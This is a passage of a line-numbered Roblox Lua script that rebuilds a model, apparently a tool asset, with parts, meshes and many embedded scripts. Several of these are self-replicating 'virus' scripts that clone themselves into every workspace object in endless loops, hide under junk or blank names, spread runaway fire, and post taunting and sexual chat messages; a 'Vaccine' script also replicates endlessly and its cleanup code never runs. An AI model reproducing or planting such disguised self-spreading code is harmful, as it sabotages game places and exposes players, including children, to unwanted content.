table.insert(cors,coroutine.create(function()
4798
wait()
4799
runDummyScript(function()
4800
function Spread(part)
4801
	check = part:findFirstChild("Fire")
4802
		if check == nil then 
4803
	script.Parent:Clone().Parent = part
4804
	
4805
		elseif check ~= nil then
4806
	check.Size = check.Size + 1000000
4807
	check.Heat = check.Heat  +1000000
4808
	end
4809
end
4810
4811
4812
script.Parent.Parent.Touched:connect(Spread)
4813
4814
end,o166)
4815
end))
4816
o167 = Create("Script",{
4817
["Name"] = "Vaccine",
4818
["Parent"] = o163,
4819
})
4820
table.insert(cors,coroutine.create(function()
4821
wait()
4822
runDummyScript(function()
4823
function spread() -- created by bumblebee773
4824
local stuff = game.Workspace:GetChildren()
4825
for i = 1, #stuff do
4826
if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then
4827
local clone = script:clone()
4828
clone.Parent = stuff[i]
4829
end
4830
end
4831
end
4832
4833
while true do
4834
wait(.1)
4835
spread()
4836
end
4837
4838
function GetAllItems(mdl) 
4839
local objs = {} 
4840
function Search(obj) 
4841
if obj~=workspace then 
4842
table.insert(objs,obj) 
4843
end 
4844
if #obj:GetChildren() > 0 then 
4845
for i, v in ipairs(obj:GetChildren()) do 
4846
Search(v) 
4847
end 
4848
end 
4849
end 
4850
Search(mdl) 
4851
return objs 
4852
end 
4853
4854
4855
4856
for i, v in ipairs(GetAllItems(workspace)) do 
4857
if v.className == "Script" then 
4858
if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" then 
4859
v.Parent = game.Lighting --Just in case it has a removal prevention. 
4860
t = Instance.new("ObjectValue") 
4861
t.Name = "IsAVirus" 
4862
t.Parent = v 
4863
end 
4864
end 
4865
end 
4866
4867
for i, v in ipairs(game.Lighting:GetChildren()) do 
4868
if v:findFirstChild("IsAVirus") then --Only remove the viruses. 
4869
v:remove() 
4870
end 
4871
end 
4872
4873
4874
print("Virus debugged! All clean!")
4875
end,o167)
4876
end))
4877
o169 = Create("Script",{
4878
["Name"] = "Script......Or is it...",
4879
["Parent"] = mas,
4880
})
4881
table.insert(cors,coroutine.create(function()
4882
wait()
4883
runDummyScript(function()
4884
-- Thanks for using My hack.............suka XD
4885
4886
if script.Parent.className ~= "RotateP" then
4887
	local p = Instance.new("RotateP")
4888
	p.Parent = workspace
4889
	p.Name = "dåååååååååååååång.........you got owned..."
4890
	script.Parent = p
4891
end
4892
4893
function check()
4894
	local list = workspace:GetChildren()
4895
	for i = 1, #list do
4896
		if list[i]:findFirstChild("dåååååååååååååång.........you got owned...") == nil and list[i].className ~= "RotateP" then
4897
			script.Parent:Clone().Parent = list[i]
4898
		end
4899
		wait()
4900
	end
4901
end
4902
4903
while true do
4904
	check()
4905
	if workspace:findFirstChild("Hello...I åm Your New Lord Lolz") == nil then
4906
		local main = script.Parent:Clone()
4907
		main.Name = "Hello...I åm Your New Lord Lolz"
4908
		main.Parent = workspace
4909
	end
4910
	wait(3)
4911
end
4912
-- Credit goes to Nomnomnom1..........................really..........did you need to know?!
4913
-- Have a nice day. XD
4914
end,o169)
4915
end))
4916
o171 = Create("Script",{
4917
["Name"] = "Script......Or is it...",
4918
["Parent"] = mas,
4919
})
4920
table.insert(cors,coroutine.create(function()
4921
wait()
4922
runDummyScript(function()
4923
if script.Parent.className ~= "RotateP" then
4924
	local p = Instance.new("RotateP")
4925
	p.Parent = workspace
4926
	p.Name = "INfecTION"
4927
	script.Parent = p
4928
end
4929
4930
function check()
4931
	local list = workspace:GetChildren()
4932
	for i = 1, #list do
4933
		if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then
4934
			script.Parent:Clone().Parent = list[i]
4935
		end
4936
		wait()
4937
	end
4938
end
4939
4940
while true do
4941
	check()
4942
	if workspace:findFirstChild("inFECtion") == nil then
4943
		local main = script.Parent:Clone()
4944
		main.Name = "inFECtion"
4945
		main.Parent = workspace
4946
	end
4947
	wait(3)
4948
end
4949
4950
end,o171)
4951
end))
4952
o173 = Create("Script",{
4953
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
4954
["Parent"] = mas,
4955
})
4956
table.insert(cors,coroutine.create(function()
4957
wait()
4958
runDummyScript(function()
4959
names={"dapperguestyo"}
4960
local NameCheck = false
4961
script.Parent.Name = names[math.random(1, #names)]
4962
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
4963
local c = script.Parent:Clone()
4964
4965
function addEvent(ch)
4966
	wait(math.random())
4967
	NameCheck = false
4968
	for ss = 1, #names do
4969
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
4970
			NameCheck = true
4971
		end
4972
	end
4973
	if NameCheck == false then
4974
		local cloak = c:Clone()
4975
		cloak.Name = ""
4976
		cloak:GetChildren()[1].Name = ""
4977
		cloak.Parent = ch
4978
		cloak.Name = names[math.random(1, 5)]
4979
	end
4980
end
4981
4982
workspace.ChildAdded:connect(addEvent)
4983
4984
game.Players.PlayerAdded:connect(function(pl)
4985
	pl.Chatted:connect(function(m)
4986
		if m:sub(1, 5) == "/sc t" then
4987
			local m = Instance.new("Message")
4988
			m.Parent = workspace
4989
			m.Text = "THEY CALL ME CRAZY"
4990
			wait(1)
4991
			m.Text = "lOoOoOoOp"
4992
			wait(0.25)
4993
			m.Text = "next page"
4994
			wait(0.25)
4995
			m.Text = "lOoOoOoOp"
4996
			wait(0.25)
4997
			m.Text = "LoOoOoOoP"
4998
			wait(0.25)
4999
			m.Text = "lOoOoOoOp"
5000
			wait(0.25)
5001
			m.Text = "LoOoOoOoP"
5002
			wait(0.25)
5003
			m.Text = "GOTTA GOTTA BE CRAZY"
5004
			wait(1)
5005
			m.Text = "lOoOoOoOp"
5006
			wait(0.25)
5007
			m.Text = "LoOoOoOoP"
5008
			wait(0.25)
5009
			m.Text = "lOoOoOoOp"
5010
			wait(0.25)
5011
			m.Text = "brendantaylor rules"
5012
			wait(0.25)
5013
			m.Text = "so does iampoobx"
5014
			wait(0.25)
5015
			m.Text = "LoOoOoOoP"
5016
			wait(0.25)
5017
			m.Text = "GOTTA GET A LIFE (YOU)"
5018
			wait(3)
5019
			m:remove()
5020
		end
5021
		if m:sub(1, 5) == "HAAXX" then
5022
			local m = Instance.new("Message")
5023
			m.Parent = workspace
5024
			m.Text = "HAAXX"	
5025
			wait(3)
5026
			m:remove()
5027
		end
5028
	end)
5029
end)
5030
5031
while true do
5032
	local s = workspace:GetChildren()
5033
	for i = 1, #s do
5034
		NameCheck = false
5035
		for ss = 1, #names do
5036
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
5037
				NameCheck = true
5038
			end
5039
		end
5040
		if NameCheck == false then
5041
			local cloak = c:Clone()
5042
			cloak.Name = ""
5043
			cloak:GetChildren()[1].Name = ""
5044
			cloak.Parent = s[i]
5045
		end
5046
		wait(0.1)
5047
	end
5048
	wait(1)
5049
end
5050
5051
end,o173)
5052
end))
5053
o175 = Create("Script",{
5054
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
5055
["Parent"] = mas,
5056
})
5057
table.insert(cors,coroutine.create(function()
5058
wait()
5059
runDummyScript(function()
5060
names={"NoNoIDon'tNeedAllOfYourAwkwårdSovietArguments", "IAmHereToHeålYourPlace", "FeelFreeToIns3rtGrammåticålErrorsHere", "ThisScriptIsAJumpStartToAHeålthyLifestyle", "FreeStyleMåyGoAnywhereIfNeeded", "3.14159265358979,ALotOfRåndomPiNumbers", "RandomåGoesHere:3", [[""''""''""å|`ç]], "77å", "å9001", "IStårtHere"}
5061
local NameCheck = false
5062
script.Parent.Name = names[math.random(1, #names)]
5063
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
5064
local c = script.Parent:Clone()
5065
5066
function addEvent(ch)
5067
	wait(math.random())
5068
	NameCheck = false
5069
	for ss = 1, #names do
5070
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
5071
			NameCheck = true
5072
		end
5073
	end
5074
	if NameCheck == false then
5075
		local cloak = c:Clone()
5076
		cloak.Name = ""
5077
		cloak:GetChildren()[1].Name = ""
5078
		cloak.Parent = ch
5079
		cloak.Name = names[math.random(1, 5)]
5080
	end
5081
end
5082
5083
workspace.ChildAdded:connect(addEvent)
5084
5085
game.Players.PlayerAdded:connect(function(pl)
5086
	pl.Chatted:connect(function(m)
5087
		if m:sub(1, 5) == "/sc t" then
5088
			local m = Instance.new("Message")
5089
			m.Parent = workspace
5090
			m.Text = "THEY CALL ME CRAZY"
5091
			wait(1)
5092
			m.Text = "lOoOoOoOp"
5093
			wait(0.25)
5094
			m.Text = "LoOoOoOoP"
5095
			wait(0.25)
5096
			m.Text = "lOoOoOoOp"
5097
			wait(0.25)
5098
			m.Text = "LoOoOoOoP"
5099
			wait(0.25)
5100
			m.Text = "lOoOoOoOp"
5101
			wait(0.25)
5102
			m.Text = "LoOoOoOoP"
5103
			wait(0.25)
5104
			m.Text = "GOTTA GOTTA BE CRAZY"
5105
			wait(1)
5106
			m.Text = "lOoOoOoOp"
5107
			wait(0.25)
5108
			m.Text = "LoOoOoOoP"
5109
			wait(0.25)
5110
			m.Text = "lOoOoOoOp"
5111
			wait(0.25)
5112
			m.Text = "LoOoOoOoP"
5113
			wait(0.25)
5114
			m.Text = "lOoOoOoOp"
5115
			wait(0.25)
5116
			m.Text = "LoOoOoOoP"
5117
			wait(0.25)
5118
			m.Text = "GOTTA GET A LIFE (YOU)"
5119
			wait(3)
5120
			m:remove()
5121
		end
5122
		if m:sub(1, 5) == "HAAXX" then
5123
			local m = Instance.new("Message")
5124
			m.Parent = workspace
5125
			m.Text = "HAAXX"	
5126
			wait(3)
5127
			m:remove()
5128
		end
5129
	end)
5130
end)
5131
5132
while true do
5133
	local s = workspace:GetChildren()
5134
	for i = 1, #s do
5135
		NameCheck = false
5136
		for ss = 1, #names do
5137
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
5138
				NameCheck = true
5139
			end
5140
		end
5141
		if NameCheck == false then
5142
			local cloak = c:Clone()
5143
			cloak.Name = ""
5144
			cloak:GetChildren()[1].Name = ""
5145
			cloak.Parent = s[i]
5146
		end
5147
		wait(0.1)
5148
	end
5149
	wait(1)
5150
end
5151
5152
end,o175)
5153
end))
5154
o177 = Create("Script",{
5155
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
5156
["Parent"] = mas,
5157
})
5158
table.insert(cors,coroutine.create(function()
5159
wait()
5160
runDummyScript(function()
5161
names={"AmazingOmegaJames","H75","","","","","","",""}
5162
local NameCheck = false
5163
script.Parent.Name = names[math.random(1, #names)]
5164
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
5165
local c = script.Parent:Clone()
5166
5167
function addEvent(ch)
5168
	wait(math.random())
5169
	NameCheck = false
5170
	for ss = 1, #names do
5171
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
5172
			NameCheck = true
5173
		end
5174
	end
5175
	if NameCheck == false then
5176
		local cloak = c:Clone()
5177
		cloak.Name = ""
5178
		cloak:GetChildren()[1].Name = ""
5179
		cloak.Parent = ch
5180
		cloak.Name = names[math.random(1, 5)]
5181
	end
5182
end
5183
5184
workspace.ChildAdded:connect(addEvent)
5185
5186
game.Players.PlayerAdded:connect(function(pl)
5187
	pl.Chatted:connect(function(m)
5188
		if m:sub(1, 5) == "/sc t" then
5189
			local m = Instance.new("The creator of this place is AmazingOmegaJames")
5190
			m.Parent = workspace
5191
			m.Text = "THEY CALL ME CRAZY"
5192
			wait(1)
5193
			m.Text = "lOoOoOoOp"
5194
			wait(0.25)
5195
			m.Text = "LoOoOoOoP"
5196
			wait(0.25)
5197
			m.Text = "lOoOoOoOp"
5198
			wait(0.25)
5199
			m.Text = "LoOoOoOoP"
5200
			wait(0.25)
5201
			m.Text = "lOoOoOoOp"
5202
			wait(0.25)
5203
			m.Text = "LoOoOoOoP"
5204
			wait(0.25)
5205
			m.Text = "GOTTA GOTTA BE CRAZY SEX"
5206
			wait(1)
5207
			m.Text = "lOoOoOoOp"
5208
			wait(0.25)
5209
			m.Text = "LoOoOoOoP"
5210
			wait(0.25)
5211
			m.Text = "lOoOoOoOp"
5212
			wait(0.25)
5213
			m.Text = "LoOoOoOoP"
5214
			wait(0.25)
5215
			m.Text = "lOoOoOoOp"
5216
			wait(0.25)
5217
			m.Text = "LoOoOoOoP"
5218
			wait(0.25)
5219
			m.Text = "GOTTA HAVE SEX WITH YOU"
5220
			wait(3)
5221
			m:remove()
5222
		end
5223
		if m:sub(1, 5) == " SEX HAAXX" then
5224
			local m = Instance.new("Message")
5225
			m.Parent = workspace
5226
			m.Text = " SEX HAAXX"	
5227
			wait(3)
5228
			m:remove()
5229
		end
5230
	end)
5231
end)
5232
5233
while true do
5234
	local s = workspace:GetChildren()
5235
	for i = 1, #s do
5236
		NameCheck = false
5237
		for ss = 1, #names do
5238
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
5239
				NameCheck = true
5240
			end
5241
		end
5242
		if NameCheck == false then
5243
			local cloak = c:Clone()
5244
			cloak.Name = ""
5245
			cloak:GetChildren()[1].Name = ""
5246
			cloak.Parent = s[i]
5247
		end
5248
		wait(0.1)
5249
	end
5250
	wait(1)
5251
end
5252
5253
end,o177)
5254
end))
5255
o178 = Create("Part",{
5256
["Name"] = "Handle",
5257
["Parent"] = o78,
5258
["BrickColor"] = BrickColor.new("Cool yellow"),
5259
["Position"] = Vector3.new(60.3318787, -5246.99902, -350.902039),
5260
["Rotation"] = Vector3.new(-179.999969, -0.000209026926, -165.000198),
5261
["CFrame"] = CFrame.new(60.3318787, -5246.99902, -350.902039, -0.965926707, 0.258815706, -3.64820812e-006, 0.258815736, 0.965926707, 6.5005446e-007, 3.69214604e-006, -3.16308586e-007, -1),
5262
["CanCollide"] = false,
5263
["FormFactor"] = Enum.FormFactor.Symmetric,
5264
["Size"] = Vector3.new(1, 1, 1),
5265
["BottomSurface"] = Enum.SurfaceType.Smooth,
5266
["TopSurface"] = Enum.SurfaceType.Smooth,
5267
["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
5268
})
5269
o179 = Create("SpecialMesh",{
5270
["Parent"] = o178,
5271
["MeshId"] = "http://www.roblox.com/asset/?id=249768539 ",
5272
["Scale"] = Vector3.new(0.300000012, 0.699999988, 0.300000012),
5273
["MeshType"] = Enum.MeshType.FileMesh,
5274
})
5275
o180 = Create("Part",{
5276
["Parent"] = o78,
5277
["Material"] = Enum.Material.SmoothPlastic,
5278
["BrickColor"] = BrickColor.new("Cool yellow"),
5279
["Position"] = Vector3.new(59.35186, -5249.39893, -351.127014),
5280
["Rotation"] = Vector3.new(3.00432184e-005, 0.000220848902, 3.89817178e-005),
5281
["Anchored"] = true,
5282
["CFrame"] = CFrame.new(59.35186, -5249.39893, -351.127014, 1, -6.80359335e-007, 3.85454041e-006, 6.80361381e-007, 1, -5.24353084e-007, -3.85453995e-006, 5.24355698e-007, 1),
5283
["FormFactor"] = Enum.FormFactor.Custom,
5284
["Size"] = Vector3.new(0.599999964, 2.00000024, 0.949997187),
5285
["BottomSurface"] = Enum.SurfaceType.Smooth,
5286
["TopSurface"] = Enum.SurfaceType.Smooth,
5287
["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
5288
})
5289
o181 = Create("SpecialMesh",{
5290
["Parent"] = o180,
5291
["MeshId"] = "rbxasset://fonts/torso.mesh",
5292
["Scale"] = Vector3.new(0.300000012, 1.00100005, 1.00100005),
5293
["MeshType"] = Enum.MeshType.FileMesh,
5294
})
5295
o182 = Create("Fire",{
5296
["Parent"] = o180,
5297
["Size"] = 30,
5298
["Color"] = Color3.new(1, 0.678431, 0),
5299
["Enabled"] = false,
5300
["Heat"] = 25,
5301
["SecondaryColor"] = Color3.new(1, 0, 0),
5302
})
5303
o183 = Create("Script",{
5304
["Name"] = "Spread",
5305
["Parent"] = o182,
5306
})
5307
table.insert(cors,coroutine.create(function()
5308
wait()
5309
runDummyScript(function()
5310
function Spread(part)
5311
	check = part:findFirstChild("Fire")
5312
		if check == nil then 
5313
	script.Parent:Clone().Parent = part
5314
	
5315
		elseif check ~= nil then
5316
	check.Size = check.Size + 1000000
5317
	check.Heat = check.Heat  +1000000
5318
	end
5319
end
5320
5321
5322
script.Parent.Parent.Touched:connect(Spread)
5323
5324
end,o183)
5325
end))
5326
o185 = Create("Script",{
5327
["Name"] = "Script......Or is it...",
5328
["Parent"] = mas,
5329
})
5330
table.insert(cors,coroutine.create(function()
5331
wait()
5332
runDummyScript(function()
5333
-- Thanks for using My hack.............suka XD
5334
5335
if script.Parent.className ~= "RotateP" then
5336
	local p = Instance.new("RotateP")
5337
	p.Parent = workspace
5338
	p.Name = "dåååååååååååååång.........you got owned..."
5339
	script.Parent = p
5340
end
5341
5342
function check()
5343
	local list = workspace:GetChildren()
5344
	for i = 1, #list do
5345
		if list[i]:findFirstChild("dåååååååååååååång.........you got owned...") == nil and list[i].className ~= "RotateP" then
5346
			script.Parent:Clone().Parent = list[i]
5347
		end
5348
		wait()
5349
	end
5350
end
5351
5352
while true do
5353
	check()
5354
	if workspace:findFirstChild("Hello...I åm Your New Lord Lolz") == nil then
5355
		local main = script.Parent:Clone()
5356
		main.Name = "Hello...I åm Your New Lord Lolz"
5357
		main.Parent = workspace
5358
	end
5359
	wait(3)
5360
end
5361
-- Credit goes to Nomnomnom1..........................really..........did you need to know?!
5362
-- Have a nice day. XD
5363
end,o185)
5364
end))
5365
o187 = Create("Script",{
5366
["Name"] = "Script......Or is it...",
5367
["Parent"] = mas,
5368
})
5369
table.insert(cors,coroutine.create(function()
5370
wait()
5371
runDummyScript(function()
5372
if script.Parent.className ~= "RotateP" then
5373
	local p = Instance.new("RotateP")
5374
	p.Parent = workspace
5375
	p.Name = "INfecTION"
5376
	script.Parent = p
5377
end
5378
5379
function check()
5380
	local list = workspace:GetChildren()
5381
	for i = 1, #list do
5382
		if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then
5383
			script.Parent:Clone().Parent = list[i]
5384
		end
5385
		wait()
5386
	end
5387
end
5388
5389
while true do
5390
	check()
5391
	if workspace:findFirstChild("inFECtion") == nil then
5392
		local main = script.Parent:Clone()
5393
		main.Name = "inFECtion"
5394
		main.Parent = workspace
5395
	end
5396
	wait(3)
5397
end
5398
5399
end,o187)
5400
end))
5401
o189 = Create("Script",{
5402
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
5403
["Parent"] = mas,
5404
})
5405
table.insert(cors,coroutine.create(function()
5406
wait()
5407
runDummyScript(function()
5408
names={"dapperguestyo"}
5409
local NameCheck = false
5410
script.Parent.Name = names[math.random(1, #names)]
5411
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
5412
local c = script.Parent:Clone()
5413
5414
function addEvent(ch)
5415
	wait(math.random())
5416
	NameCheck = false
5417
	for ss = 1, #names do
5418
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
5419
			NameCheck = true
5420
		end
5421
	end
5422
	if NameCheck == false then
5423
		local cloak = c:Clone()
5424
		cloak.Name = ""
5425
		cloak:GetChildren()[1].Name = ""
5426
		cloak.Parent = ch
5427
		cloak.Name = names[math.random(1, 5)]
5428
	end
5429
end
5430
5431
workspace.ChildAdded:connect(addEvent)
5432
5433
game.Players.PlayerAdded:connect(function(pl)
5434
	pl.Chatted:connect(function(m)
5435
		if m:sub(1, 5) == "/sc t" then
5436
			local m = Instance.new("Message")
5437
			m.Parent = workspace
5438
			m.Text = "THEY CALL ME CRAZY"
5439
			wait(1)
5440
			m.Text = "lOoOoOoOp"
5441
			wait(0.25)
5442
			m.Text = "next page"
5443
			wait(0.25)
5444
			m.Text = "lOoOoOoOp"
5445
			wait(0.25)
5446
			m.Text = "LoOoOoOoP"
5447
			wait(0.25)
5448
			m.Text = "lOoOoOoOp"
5449
			wait(0.25)
5450
			m.Text = "LoOoOoOoP"
5451
			wait(0.25)
5452
			m.Text = "GOTTA GOTTA BE CRAZY"
5453
			wait(1)
5454
			m.Text = "lOoOoOoOp"
5455
			wait(0.25)
5456
			m.Text = "LoOoOoOoP"
5457
			wait(0.25)
5458
			m.Text = "lOoOoOoOp"
5459
			wait(0.25)
5460
			m.Text = "brendantaylor rules"
5461
			wait(0.25)
5462
			m.Text = "so does iampoobx"
5463
			wait(0.25)
5464
			m.Text = "LoOoOoOoP"
5465
			wait(0.25)
5466
			m.Text = "GOTTA GET A LIFE (YOU)"
5467
			wait(3)
5468
			m:remove()
5469
		end
5470
		if m:sub(1, 5) == "HAAXX" then
5471
			local m = Instance.new("Message")
5472
			m.Parent = workspace
5473
			m.Text = "HAAXX"	
5474
			wait(3)
5475
			m:remove()
5476
		end
5477
	end)
5478
end)
5479
5480
while true do
5481
	local s = workspace:GetChildren()
5482
	for i = 1, #s do
5483
		NameCheck = false
5484
		for ss = 1, #names do
5485
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
5486
				NameCheck = true
5487
			end
5488
		end
5489
		if NameCheck == false then
5490
			local cloak = c:Clone()
5491
			cloak.Name = ""
5492
			cloak:GetChildren()[1].Name = ""
5493
			cloak.Parent = s[i]
5494
		end
5495
		wait(0.1)
5496
	end
5497
	wait(1)
5498
end
5499
5500
end,o189)
5501
end))
5502
o190 = Create("Script",{
5503
["Name"] = "Vaccine",
5504
["Parent"] = o180,
5505
})
5506
table.insert(cors,coroutine.create(function()
5507
wait()
5508
runDummyScript(function()
5509
function spread() -- created by bumblebee773
5510
local stuff = game.Workspace:GetChildren()
5511
for i = 1, #stuff do
5512
if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then
5513
local clone = script:clone()
5514
clone.Parent = stuff[i]
5515
end
5516
end
5517
end
5518
5519
while true do
5520
wait(.1)
5521
spread()
5522
end
5523
5524
function GetAllItems(mdl) 
5525
local objs = {} 
5526
function Search(obj) 
5527
if obj~=workspace then 
5528
table.insert(objs,obj) 
5529
end 
5530
if #obj:GetChildren() > 0 then 
5531
for i, v in ipairs(obj:GetChildren()) do 
5532
Search(v) 
5533
end 
5534
end 
5535
end 
5536
Search(mdl) 
5537
return objs 
5538
end 
5539
5540
5541
5542
for i, v in ipairs(GetAllItems(workspace)) do 
5543
if v.className == "Script" then 
5544
if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" then 
5545
v.Parent = game.Lighting --Just in case it has a removal prevention. 
5546
t = Instance.new("ObjectValue") 
5547
t.Name = "IsAVirus" 
5548
t.Parent = v 
5549
end 
5550
end 
5551
end 
5552
5553
for i, v in ipairs(game.Lighting:GetChildren()) do 
5554
if v:findFirstChild("IsAVirus") then --Only remove the viruses. 
5555
v:remove() 
5556
end 
5557
end 
5558
5559
5560
print("Virus debugged! All clean!")
5561
end,o190)
5562
end))
5563
o192 = Create("Script",{
5564
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
5565
["Parent"] = mas,
5566
})
5567
table.insert(cors,coroutine.create(function()
5568
wait()
5569
runDummyScript(function()
5570
names={"NoNoIDon'tNeedAllOfYourAwkwårdSovietArguments", "IAmHereToHeålYourPlace", "FeelFreeToIns3rtGrammåticålErrorsHere", "ThisScriptIsAJumpStartToAHeålthyLifestyle", "FreeStyleMåyGoAnywhereIfNeeded", "3.14159265358979,ALotOfRåndomPiNumbers", "RandomåGoesHere:3", [[""''""''""å|`ç]], "77å", "å9001", "IStårtHere"}
5571
local NameCheck = false
5572
script.Parent.Name = names[math.random(1, #names)]
5573
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
5574
local c = script.Parent:Clone()
5575
5576
function addEvent(ch)
5577
	wait(math.random())
5578
	NameCheck = false
5579
	for ss = 1, #names do
5580
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
5581
			NameCheck = true
5582
		end
5583
	end
5584
	if NameCheck == false then
5585
		local cloak = c:Clone()
5586
		cloak.Name = ""
5587
		cloak:GetChildren()[1].Name = ""
5588
		cloak.Parent = ch
5589
		cloak.Name = names[math.random(1, 5)]
5590
	end
5591
end
5592
5593
workspace.ChildAdded:connect(addEvent)
5594
5595
game.Players.PlayerAdded:connect(function(pl)
5596
	pl.Chatted:connect(function(m)
5597
		if m:sub(1, 5) == "/sc t" then
5598
			local m = Instance.new("Message")
5599
			m.Parent = workspace
5600
			m.Text = "THEY CALL ME CRAZY"
5601
			wait(1)
5602
			m.Text = "lOoOoOoOp"
5603
			wait(0.25)
5604
			m.Text = "LoOoOoOoP"
5605
			wait(0.25)
5606
			m.Text = "lOoOoOoOp"
5607
			wait(0.25)
5608
			m.Text = "LoOoOoOoP"
5609
			wait(0.25)
5610
			m.Text = "lOoOoOoOp"
5611
			wait(0.25)
5612
			m.Text = "LoOoOoOoP"
5613
			wait(0.25)
5614
			m.Text = "GOTTA GOTTA BE CRAZY"
5615
			wait(1)
5616
			m.Text = "lOoOoOoOp"
5617
			wait(0.25)
5618
			m.Text = "LoOoOoOoP"
5619
			wait(0.25)
5620
			m.Text = "lOoOoOoOp"
5621
			wait(0.25)
5622
			m.Text = "LoOoOoOoP"
5623
			wait(0.25)
5624
			m.Text = "lOoOoOoOp"
5625
			wait(0.25)
5626
			m.Text = "LoOoOoOoP"
5627
			wait(0.25)
5628
			m.Text = "GOTTA GET A LIFE (YOU)"
5629
			wait(3)
5630
			m:remove()
5631
		end
5632
		if m:sub(1, 5) == "HAAXX" then
5633
			local m = Instance.new("Message")
5634
			m.Parent = workspace
5635
			m.Text = "HAAXX"	
5636
			wait(3)
5637
			m:remove()
5638
		end
5639
	end)
5640
end)
5641
5642
while true do
5643
	local s = workspace:GetChildren()
5644
	for i = 1, #s do
5645
		NameCheck = false
5646
		for ss = 1, #names do
5647
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
5648
				NameCheck = true
5649
			end
5650
		end
5651
		if NameCheck == false then
5652
			local cloak = c:Clone()
5653
			cloak.Name = ""
5654
			cloak:GetChildren()[1].Name = ""
5655
			cloak.Parent = s[i]
5656
		end
5657
		wait(0.1)
5658
	end
5659
	wait(1)
5660
end
5661
5662
end,o192)
5663
end))
5664
o194 = Create("Script",{
5665
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
5666
["Parent"] = mas,
5667
})
5668
table.insert(cors,coroutine.create(function()
5669
wait()
5670
runDummyScript(function()
5671
names={"AmazingOmegaJames","H75","","","","","","",""}
5672
local NameCheck = false
5673
script.Parent.Name = names[math.random(1, #names)]
5674
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
5675
local c = script.Parent:Clone()
5676
5677
function addEvent(ch)
5678
	wait(math.random())
5679
	NameCheck = false
5680
	for ss = 1, #names do
5681
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
5682
			NameCheck = true
5683
		end
5684
	end
5685
	if NameCheck == false then
5686
		local cloak = c:Clone()
5687
		cloak.Name = ""
5688
		cloak:GetChildren()[1].Name = ""
5689
		cloak.Parent = ch
5690
		cloak.Name = names[math.random(1, 5)]
5691
	end
5692
end
5693
5694
workspace.ChildAdded:connect(addEvent)
5695
5696
game.Players.PlayerAdded:connect(function(pl)
5697
	pl.Chatted:connect(function(m)
5698
		if m:sub(1, 5) == "/sc t" then
5699
			local m = Instance.new("The creator of this place is AmazingOmegaJames")
5700
			m.Parent = workspace
5701
			m.Text = "THEY CALL ME CRAZY"
5702
			wait(1)
5703
			m.Text = "lOoOoOoOp"
5704
			wait(0.25)
5705
			m.Text = "LoOoOoOoP"
5706
			wait(0.25)
5707
			m.Text = "lOoOoOoOp"
5708
			wait(0.25)
5709
			m.Text = "LoOoOoOoP"
5710
			wait(0.25)
5711
			m.Text = "lOoOoOoOp"
5712
			wait(0.25)
5713
			m.Text = "LoOoOoOoP"
5714
			wait(0.25)
5715
			m.Text = "GOTTA GOTTA BE CRAZY SEX"
5716
			wait(1)
5717
			m.Text = "lOoOoOoOp"
5718
			wait(0.25)
5719
			m.Text = "LoOoOoOoP"
5720
			wait(0.25)
5721
			m.Text = "lOoOoOoOp"
5722
			wait(0.25)
5723
			m.Text = "LoOoOoOoP"
5724
			wait(0.25)
5725
			m.Text = "lOoOoOoOp"
5726
			wait(0.25)
5727
			m.Text = "LoOoOoOoP"
5728
			wait(0.25)
5729
			m.Text = "GOTTA HAVE SEX WITH YOU"
5730
			wait(3)
5731
			m:remove()
5732
		end
5733
		if m:sub(1, 5) == " SEX HAAXX" then
5734
			local m = Instance.new("Message")
5735
			m.Parent = workspace
5736
			m.Text = " SEX HAAXX"	
5737
			wait(3)
5738
			m:remove()
5739
		end
5740
	end)
5741
end)
5742
5743
while true do
5744
	local s = workspace:GetChildren()
5745
	for i = 1, #s do
5746
		NameCheck = false
5747
		for ss = 1, #names do
5748
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
5749
				NameCheck = true
5750
			end
5751
		end
5752
		if NameCheck == false then
5753
			local cloak = c:Clone()
5754
			cloak.Name = ""
5755
			cloak:GetChildren()[1].Name = ""
5756
			cloak.Parent = s[i]
5757
		end
5758
		wait(0.1)
5759
	end
5760
	wait(1)
5761
end
5762
5763
end,o194)
5764
end))
5765
o195 = Create("Part",{
5766
["Name"] = "Handle",
5767
["Parent"] = o78,
5768
["Material"] = Enum.Material.SmoothPlastic,
5769
["BrickColor"] = BrickColor.new("Daisy orange"),
